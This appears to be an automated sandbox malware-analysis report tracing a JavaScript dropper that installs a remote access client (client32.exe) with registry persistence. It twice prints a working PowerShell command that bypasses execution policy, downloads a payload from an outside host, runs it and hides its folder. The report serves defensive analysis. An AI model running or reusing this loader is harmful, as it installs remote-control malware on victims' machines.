Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_1109D860: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_1109D8F0: AdjustTokenPrivileges, FindCloseChangeNotification
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 6_2_1109D860: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 6_2_1109D8F0: AdjustTokenPrivileges, CloseHandle
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_11116880: CoInitialize, CoCreateInstance, LoadLibraryA, GetProcAddress, SHGetSettings, FreeLibrary, CoUninitialize
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_11089430: FindResourceA, LoadResource, LockResource
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_11128B10: GetMessageA, Sleep, OpenSCManagerA, DispatchMessageA, OpenServiceA, CloseServiceHandle, StartServiceA, GetLastError, CloseServiceHandle, CloseServiceHandle, GetLastError, CloseServiceHandle, GetLastError
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Roaming\QCHBWPB-9
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33jlajbv.reg.ps1
Source: C:\Windows\System32\wscript.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
Source: unknown; Process created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
Source: unknown; Process created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
Source: C:\Windows\System32\wscript.exe; Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Sections loaded: apphelp.dll, pcicl32.dll, secur32.dll, shfolder.dll, pcichek.dll, pcicapi.dll, mpr.dll, version.dll, winmm.dll, wsock32.dll, oleacc.dll, netapi32.dll, wininet.dll, msvcr100.dll, sspicli.dll, samcli.dll, netutils.dll, dbghelp.dll, wtsapi32.dll, dbgcore.dll, uxtheme.dll, kernel.appcore.dll, nsmtrace.dll, nslsp.dll, devobj.dll, msasn1.dll, pcihooks.dll, textshaping.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\QCHBWPB-9\NSM.ini
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: updates.js Static file information: File size 7684589 > 1048576
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dll
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe

                                Data Obfuscation

                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-It
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,InternetQueryDataAvailable,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029BB0
                                Source: PCICL32.DLL.2.dr Static PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F07567 push ebx; iretd 2_2_00007FF848F0756A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F000BD pushad ; iretd 2_2_00007FF848F000C1
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1116FF15 push ecx; ret 4_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1116AE09 push ecx; ret 4_2_1116AE1C
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF26BBF push ecx; ret 4_2_6EF26BD2
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1116FF15 push ecx; ret 6_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1116AE09 push ecx; ret 6_2_1116AE1C
                                Source: msvcr100.dll.2.dr Static PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exe
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF07030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,4_2_6EF07030
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BTGEEENA
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,4_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,4_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11113380 IsIconic,GetTickCount,4_2_11113380
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,4_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,4_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,4_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,4_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,4_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,4_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,4_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,4_2_11024880
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,6_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11113380 IsIconic,GetTickCount,6_2_11113380
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,6_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,6_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,6_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,6_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,6_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,6_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,6_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,6_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,6_2_11024880
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EEF91F04_2_6EEF91F0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF04F304_2_6EF04F30
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110B86C0 Sleep,ExitProcess,4_2_110B86C0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110B86C0 Sleep,ExitProcess,6_2_110B86C0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4359Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5502Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWindow / User API: threadDelayed 526Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWindow / User API: threadDelayed 417Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWindow / User API: threadDelayed 7768Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-83084
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88417
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88019
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88622
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88754
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decisiongraph_4-88788
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_4-88158
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-82763
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI coverage: 6.8 %
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeAPI coverage: 2.8 %
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3060Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe TID: 3732Thread sleep time: -131500s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe TID: 4112Thread sleep time: -41700s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe TID: 3732Thread sleep time: -1942000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF03130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6EF03226h4_2_6EF03130
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
